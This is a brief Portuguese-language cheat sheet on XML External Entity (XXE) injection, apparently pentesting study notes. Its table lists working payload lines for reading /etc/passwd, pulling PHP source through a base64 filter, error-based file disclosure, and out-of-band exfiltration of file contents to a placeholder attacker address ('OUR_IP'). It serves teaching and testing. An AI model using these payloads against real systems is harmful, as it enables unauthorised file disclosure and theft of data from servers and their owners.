# XXE

`XML External Entity (XXE) Injection`vulnerabilidades ocorrem quando dados XML são retirados de uma entrada controlada pelo usuário sem higienizá-los adequadamente ou analisá-los com segurança, o que pode nos permitir usar recursos XML para executar ações maliciosas. 

| `<!ENTITY xxe SYSTEM "http://localhost/email.dtd">`                                | Definir Entidade Externa para uma URL                 |
| ---------------------------------------------------------------------------------- | ----------------------------------------------------- |
| `<!ENTITY xxe SYSTEM "file:///etc/passwd">`                                        | Definir Entidade Externa para um caminho de arquivo   |
| `<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">` | Ler código fonte PHP com filtro de codificação base64 |
| `<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">`        | Lendo um arquivo através de um erro PHP               |
| `<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">`  | Lendo um arquivo OOB exfiltration                     |